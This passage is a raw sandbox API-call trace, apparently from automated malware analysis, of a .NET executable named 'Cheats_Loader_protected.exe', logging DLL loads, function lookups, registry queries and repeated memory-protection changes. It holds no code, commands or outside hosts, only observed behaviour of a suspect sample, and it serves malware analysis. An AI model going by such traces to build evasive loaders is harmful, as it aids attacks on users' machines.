dwMilliseconds=0xffffffff) returned 0x0 [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] SetEvent (hEvent=0x20c) returned 1 [0060.585] ReadFile (in: hFile=0x398, lpBuffer=0xc2968, nNumberOfBytesToRead=0x248, lpNumberOfBytesRead=0x13faf44, lpOverlapped=0x0 | out: lpBuffer=0xc2968*, lpNumberOfBytesRead=0x13faf44*=0x248, lpOverlapped=0x0) returned 1 [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] ResetEvent (hEvent=0x200) returned 1 [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] ResetEvent (hEvent=0x200) returned 1 [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] GetCurrentThreadId () returned 0x13dc [0060.587] SetEvent (hEvent=0x20c) returned 1 [0060.587] SetEvent (hEvent=0x200) returned 1 [0060.587] CloseHandle (hObject=0x398) returned 1 [0060.591] SysReAllocStringLen (in: pbstr=0x13fa44c*=0x0, psz="System.Drawing.ni.dll", len=0x15 | out: pbstr=0x13fa44c*="System.Drawing.ni.dll") returned 1 [0060.591] CharLowerBuffW (in: lpsz="System.Drawing.ni.dll", cchLength=0x15 | out: lpsz="system.drawing.ni.dll") returned 0x15 [0060.592] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x719d0000 [0060.729] GetLastError () returned 0x0 [0060.729] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.729] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0060.729] SetLastError (dwErrCode=0x0) [0060.792] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0060.792] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0060.793] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.796] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] ResetEvent (hEvent=0x200) returned 1 [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] ResetEvent (hEvent=0x200) returned 1 [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] GetCurrentThreadId () returned 0x13dc [0060.797] SetEvent (hEvent=0x20c) returned 1 [0060.797] SetEvent (hEvent=0x200) returned 1 [0060.797] CloseHandle (hObject=0x394) returned 1 [0060.821] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0060.821] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0060.821] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.824] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] ResetEvent (hEvent=0x200) returned 1 [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] ResetEvent (hEvent=0x200) returned 1 [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] GetCurrentThreadId () returned 0x13dc [0060.825] SetEvent (hEvent=0x20c) returned 1 [0060.825] SetEvent (hEvent=0x200) returned 1 [0060.826] CloseHandle (hObject=0x394) returned 1 [0060.905] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0060.905] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0060.905] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.908] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] ResetEvent (hEvent=0x200) returned 1 [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] ResetEvent (hEvent=0x200) returned 1 [0060.909] GetCurrentThreadId () returned 0x13dc [0060.909] GetCurrentThreadId () returned 0x13dc [0060.910] SetEvent (hEvent=0x20c) returned 1 [0060.910] SetEvent (hEvent=0x200) returned 1 [0060.910] CloseHandle (hObject=0x394) returned 1 [0060.957] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0060.957] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0060.957] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.960] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0060.961] GetCurrentThreadId () returned 0x13dc [0060.961] ResetEvent (hEvent=0x200) returned 1 [0060.961] GetCurrentThreadId () returned 0x13dc [0060.961] GetCurrentThreadId () returned 0x13dc [0060.961] GetCurrentThreadId () returned 0x13dc [0060.961] GetCurrentThreadId () returned 0x13dc [0060.962] ResetEvent (hEvent=0x200) returned 1 [0060.962] GetCurrentThreadId () returned 0x13dc [0060.962] GetCurrentThreadId () returned 0x13dc [0060.962] SetEvent (hEvent=0x20c) returned 1 [0060.962] SetEvent (hEvent=0x200) returned 1 [0060.962] CloseHandle (hObject=0x394) returned 1 [0060.964] SysReAllocStringLen (in: pbstr=0x13fad8c*=0x0, psz="System.Windows.Forms.ni.dll", len=0x1b | out: pbstr=0x13fad8c*="System.Windows.Forms.ni.dll") returned 1 [0060.964] CharLowerBuffW (in: lpsz="System.Windows.Forms.ni.dll", cchLength=0x1b | out: lpsz="system.windows.forms.ni.dll") returned 0x1b [0060.964] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x70cd0000 [0061.802] GetLastError () returned 0x0 [0061.802] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0061.802] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0061.803] SetLastError (dwErrCode=0x0) [0062.172] SysReAllocStringLen (in: pbstr=0x13fdf5c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fdf5c*="kernel32") returned 1 [0062.172] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.173] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0062.175] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0062.175] SysReAllocStringLen (in: pbstr=0x13fdf5c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fdf5c*="kernel32") returned 1 [0062.175] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.175] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0062.178] GetProcAddress (hModule=0x772d0000, lpProcName="LocaleNameToLCID") returned 0x772e74a0 [0062.193] SysReAllocStringLen (in: pbstr=0x13fe290*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fe290*="kernel32") returned 1 [0062.193] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.193] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0062.195] GetProcAddress (hModule=0x772d0000, lpProcName="GetUserDefaultLocaleName") returned 0x772e72c0 [0062.196] SysReAllocStringLen (in: pbstr=0x13fe1ac*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fe1ac*="kernel32") returned 1 [0062.196] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.196] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0062.262] GetProcAddress (hModule=0x772d0000, lpProcName="LCIDToLocaleName") returned 0x772e7460 [0062.262] SysReAllocStringLen (in: pbstr=0x13fe26c*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x13fe26c*="kernel32") returned 1 [0062.262] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0062.263] GetModuleHandleW (lpModuleName="kernel32") returned 0x772d0000 [0062.264] GetProcAddress (hModule=0x772d0000, lpProcName="GetUserPreferredUILanguages") returned 0x772e72e0 [0062.275] SysReAllocStringLen (in: pbstr=0x13fdd8c*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x13fdd8c*="advapi32.dll") returned 1 [0062.275] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0062.275] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x756e0000 [0062.275] GetLastError () returned 0x0 [0062.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.275] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0062.275] GetModuleFileNameA (in: hModule=0x756e0000, lpFilename=0x13fdc70, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0062.275] GetCurrentProcess () returned 0xffffffff [0062.275] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b298, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.276] GetCurrentProcess () returned 0xffffffff [0062.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b298, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.276] GetCurrentProcess () returned 0xffffffff [0062.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b2a0, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.276] GetCurrentProcess () returned 0xffffffff [0062.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b2a0, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.276] GetCurrentProcess () returned 0xffffffff [0062.276] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.277] GetCurrentProcess () returned 0xffffffff [0062.277] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.277] GetCurrentProcess () returned 0xffffffff [0062.277] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b01c, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.277] GetCurrentProcess () returned 0xffffffff [0062.277] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b01c, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.277] GetCurrentProcess () returned 0xffffffff [0062.277] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b020, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.277] GetCurrentProcess () returned 0xffffffff [0062.278] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b020, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.278] GetCurrentProcess () returned 0xffffffff [0062.278] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b02c, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.278] GetCurrentProcess () returned 0xffffffff [0062.278] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b02c, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.278] GetCurrentProcess () returned 0xffffffff [0062.278] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b048, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.278] GetCurrentProcess () returned 0xffffffff [0062.278] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b048, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.279] GetCurrentProcess () returned 0xffffffff [0062.279] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b074, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.279] GetCurrentProcess () returned 0xffffffff [0062.279] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b074, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.279] GetCurrentProcess () returned 0xffffffff [0062.279] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b0d4, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.279] GetCurrentProcess () returned 0xffffffff [0062.279] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b0d4, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.279] GetCurrentProcess () returned 0xffffffff [0062.279] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b0fc, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.280] GetCurrentProcess () returned 0xffffffff [0062.280] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b0fc, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.280] GetCurrentProcess () returned 0xffffffff [0062.280] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b124, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x4, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x2) returned 0x0 [0062.280] GetCurrentProcess () returned 0xffffffff [0062.280] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd74*=0x7574b124, NumberOfBytesToProtect=0x13fdd78, NewAccessProtection=0x2, OldAccessProtection=0x13fddac | out: BaseAddress=0x13fdd74*=0x7574b000, NumberOfBytesToProtect=0x13fdd78, OldAccessProtection=0x13fddac*=0x4) returned 0x0 [0062.280] SetLastError (dwErrCode=0x0) [0062.281] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0062.281] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyEx") returned 0x0 [0062.281] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0062.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x13feb50 | out: phkResult=0x13feb50*=0x0) returned 0x2 [0062.282] RegCloseKey (hKey=0x80000002) returned 0x0 [0062.285] SysReAllocStringLen (in: pbstr=0x13fe144*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fe144*="kernel32.dll") returned 1 [0062.285] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.285] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0062.285] GetLastError () returned 0x0 [0062.286] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.286] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0062.286] GetModuleFileNameA (in: hModule=0x772d0000, lpFilename=0x13fe028, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0062.286] SetLastError (dwErrCode=0x0) [0062.288] GetProcAddress (hModule=0x772d0000, lpProcName="GetFullPathName") returned 0x0 [0062.292] GetProcAddress (hModule=0x772d0000, lpProcName="GetFullPathNameW") returned 0x7733efa0 [0062.292] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x105, lpBuffer=0x13fedcc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x0) returned 0x33 [0062.294] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x105, lpBuffer=0x13fed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x0) returned 0x33 [0062.300] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x105, lpBuffer=0x13fed9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x0) returned 0x33 [0062.304] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadErrorMode") returned 0x772e6520 [0062.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x13ff250) returned 1 [0062.338] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesEx") returned 0x0 [0062.341] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileAttributesExW") returned 0x7733ef00 [0062.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe"), fInfoLevelId=0x0, lpFileInformation=0x13ff2cc | out: lpFileInformation=0x13ff2cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fd3fb80, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x5fd3fb80, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x5e0a3800, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x11de00)) returned 1 [0062.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x13ff24c) returned 1 [0062.344] SysReAllocStringLen (in: pbstr=0x13fe6a4*=0x0, psz="version.dll", len=0xb | out: pbstr=0x13fe6a4*="version.dll") returned 1 [0062.344] CharLowerBuffW (in: lpsz="version.dll", cchLength=0xb | out: lpsz="version.dll") returned 0xb [0062.344] LoadLibraryExW (lpLibFileName="version.dll", hFile=0x0, dwFlags=0x0) returned 0x742d0000 [0062.344] GetLastError () returned 0x0 [0062.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.345] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0062.345] GetModuleFileNameA (in: hModule=0x742d0000, lpFilename=0x13fe588, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0062.345] GetCurrentProcess () returned 0xffffffff [0062.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe68c*=0x742d50ac, NumberOfBytesToProtect=0x13fe690, NewAccessProtection=0x4, OldAccessProtection=0x13fe6c4 | out: BaseAddress=0x13fe68c*=0x742d5000, NumberOfBytesToProtect=0x13fe690, OldAccessProtection=0x13fe6c4*=0x2) returned 0x0 [0062.345] GetCurrentProcess () returned 0xffffffff [0062.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe68c*=0x742d50ac, NumberOfBytesToProtect=0x13fe690, NewAccessProtection=0x2, OldAccessProtection=0x13fe6c4 | out: BaseAddress=0x13fe68c*=0x742d5000, NumberOfBytesToProtect=0x13fe690, OldAccessProtection=0x13fe6c4*=0x4) returned 0x0 [0062.345] GetCurrentProcess () returned 0xffffffff [0062.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe68c*=0x742d50c4, NumberOfBytesToProtect=0x13fe690, NewAccessProtection=0x4, OldAccessProtection=0x13fe6c4 | out: BaseAddress=0x13fe68c*=0x742d5000, NumberOfBytesToProtect=0x13fe690, OldAccessProtection=0x13fe6c4*=0x2) returned 0x0 [0062.345] GetCurrentProcess () returned 0xffffffff [0062.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe68c*=0x742d50c4, NumberOfBytesToProtect=0x13fe690, NewAccessProtection=0x2, OldAccessProtection=0x13fe6c4 | out: BaseAddress=0x13fe68c*=0x742d5000, NumberOfBytesToProtect=0x13fe690, OldAccessProtection=0x13fe6c4*=0x4) returned 0x0 [0062.346] SetLastError (dwErrCode=0x0) [0062.346] GetProcAddress (hModule=0x742d0000, lpProcName="GetFileVersionInfoSize") returned 0x0 [0062.346] GetProcAddress (hModule=0x742d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x742d1570 [0062.348] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpdwHandle=0x13ff340 | out: lpdwHandle=0x13ff340) returned 0x0 [0062.362] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalFindAtom") returned 0x0 [0062.364] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalFindAtomW") returned 0x77312130 [0062.364] GlobalFindAtomW (lpString="WindowsFormsApp1.0.0.0") returned 0x0 [0062.367] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalAddAtom") returned 0x0 [0062.447] GetProcAddress (hModule=0x772d0000, lpProcName="GlobalAddAtomW") returned 0x773120f0 [0062.447] GlobalAddAtomW (lpString="WindowsFormsApp1.0.0.0") returned 0xc0d2 [0062.447] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x13fed94, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0062.502] SysReAllocStringLen (in: pbstr=0x13fe6a8*=0x0, psz="uxtheme.dll", len=0xb | out: pbstr=0x13fe6a8*="uxtheme.dll") returned 1 [0062.502] CharLowerBuffW (in: lpsz="uxtheme.dll", cchLength=0xb | out: lpsz="uxtheme.dll") returned 0xb [0062.503] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0062.503] GetLastError () returned 0x7e [0062.503] SetLastError (dwErrCode=0x7e) [0062.507] SysReAllocStringLen (in: pbstr=0x13fe6a8*=0x0, psz="uxtheme.dll", len=0xb | out: pbstr=0x13fe6a8*="uxtheme.dll") returned 1 [0062.507] CharLowerBuffW (in: lpsz="uxtheme.dll", cchLength=0xb | out: lpsz="uxtheme.dll") returned 0xb [0062.507] LoadLibraryExW (lpLibFileName="uxtheme.dll", hFile=0x0, dwFlags=0x800) returned 0x74310000 [0062.507] GetLastError () returned 0x0 [0062.507] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0062.508] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0062.508] GetModuleFileNameA (in: hModule=0x74310000, lpFilename=0x13fe58c, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\system32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0062.508] GetCurrentProcess () returned 0xffffffff [0062.508] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe690*=0x7437e478, NumberOfBytesToProtect=0x13fe694, NewAccessProtection=0x4, OldAccessProtection=0x13fe6c8 | out: BaseAddress=0x13fe690*=0x7437e000, NumberOfBytesToProtect=0x13fe694, OldAccessProtection=0x13fe6c8*=0x2) returned 0x0 [0062.508] GetCurrentProcess () returned 0xffffffff [0062.508] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fe690*=0x7437e478, NumberOfBytesToProtect=0x13fe694, NewAccessProtection=0x2, OldAccessProtection=0x13fe6c8 | out: BaseAddress=0x13fe690*=0x7437e000, NumberOfBytesToProtect=0x13fe694, OldAccessProtection=0x13fe6c8*=0x4) returned 0x0 [0062.508] GetCurrentProcess () returned 0xffffffff [0062.508] 